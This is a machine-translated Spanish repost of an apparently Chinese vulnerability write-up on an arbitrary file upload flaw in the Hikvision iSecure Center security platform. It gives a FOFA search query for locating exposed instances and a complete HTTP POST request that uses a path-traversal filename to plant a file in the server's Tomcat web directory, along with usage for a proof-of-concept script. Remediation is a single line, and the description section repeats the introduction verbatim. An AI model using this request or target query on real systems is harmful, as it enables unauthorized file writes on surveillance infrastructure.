Hikvision isecure center plataforma de gestión de seguridad integral vulnerabilidad de carga de archivos arbitrarios

News 2023-08-11 21:36:16 views: null

Hikvision isecure center plataforma de gestión de seguridad integral vulnerabilidad de carga de archivos arbitrarios

Descargo de responsabilidad:

No utilice las tecnologías relevantes en este artículo para participar en pruebas ilegales. Cualquier consecuencia directa o indirecta y las pérdidas causadas por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Todas las consecuencias adversas y La autor del artículo es irrelevante. Este artículo es solo para fines educativos.

1. Breve introducción de la plataforma integral de gestión de seguridad del centro isecure de Hikvision

La plataforma integral de gestión de seguridad HIKVISION iSecure Center es un conjunto de plataformas "integradas" e "inteligentes", que pueden obtener datos de nodos perimetrales mediante el acceso a videovigilancia, tarjeta todo en uno, estacionamiento, detección de alarmas y otros equipos del sistema para lograr la seguridad. integración de información Con la vinculación con el mapa electrónico, integra las capacidades de cada sistema para realizar ricas aplicaciones inteligentes. La plataforma HIKVISION iSecure Center está diseñada en base al concepto avanzado de "arquitectura de tecnología de software unificada" y adopta la tecnología de componentes comerciales para cumplir con la expansión elástica de la plataforma en términos comerciales. La plataforma es aplicable al negocio general de seguridad integral de toda la industria. Integra y gestiona de forma centralizada los recursos de cada sistema, y ​​realiza una implementación unificada, una configuración unificada, una gestión unificada y una programación unificada.

2. Descripción de la vulnerabilidad

La plataforma integral de gestión de seguridad HIKVISION iSecure Center es un conjunto de plataformas "integradas" e "inteligentes", que pueden obtener datos de nodos perimetrales mediante el acceso a videovigilancia, tarjeta todo en uno, estacionamiento, detección de alarmas y otros equipos del sistema para lograr la seguridad. integración de información Con la vinculación con el mapa electrónico, integra las capacidades de cada sistema para realizar ricas aplicaciones inteligentes. La plataforma HIKVISION iSecure Center está diseñada en base al concepto avanzado de "arquitectura de tecnología de software unificada" y adopta la tecnología de componentes comerciales para cumplir con la expansión elástica de la plataforma en términos comerciales. La plataforma es aplicable al negocio general de seguridad integral de toda la industria. Integra y gestiona de forma centralizada los recursos de cada sistema, y ​​realiza una implementación unificada, una configuración unificada, una gestión unificada y una programación unificada. La plataforma de administración de seguridad integral Hikvision isecure center tiene una vulnerabilidad de carga de archivos arbitraria

CVE编号:
CNNVD编号:
CNVD编号:

Tres, la versión de impacto

Plataforma de gestión de seguridad integrada HIKVISION iSecure Center

inserte la descripción de la imagen aquí

Cuatro, instrucción de consulta fofa

app="HIKVISION-iSecure-Center"

5. Recurrencia de la vulnerabilidad

Enlace de vulnerabilidad: https://127.0.0.1/clusterMgr/836424300.txt; Paquete de datos de vulnerabilidad .js:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c

--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream

332299402
--ea26cdac4990498b32d7a95ce5a5135c--

inserte la descripción de la imagen aquí

El archivo cargado se encuentra en /clusterMgr/153107606.txt;.js Cambie 153107606 por el nombre de archivo que cargó en el paquete de datos anterior. cargado con éxito

6. POC y EXP

Uso: python3 .\vuln31.py https://127.0.0.1/ Recuerde terminar con /.

inserte la descripción de la imagen aquí

inserte la descripción de la imagen aquí

7. Opiniones sobre rectificación

Póngase en contacto con el fabricante para encontrar una solución: https://www.hikvision.com/cn/

Supongo que te gusta

Origin blog.csdn.net/holyxp/article/details/131498469
Recomendado
Clasificación
Diario
Más
2024-05-01(4)
2024-04-30(33)
2024-04-29(5)
2024-04-28(9)
2024-04-27(28)
2024-04-26(22)
2024-04-25(34)
2024-04-24(31)
2024-04-23(29)
2024-04-22(5)

Code World

© 2018 codetd.com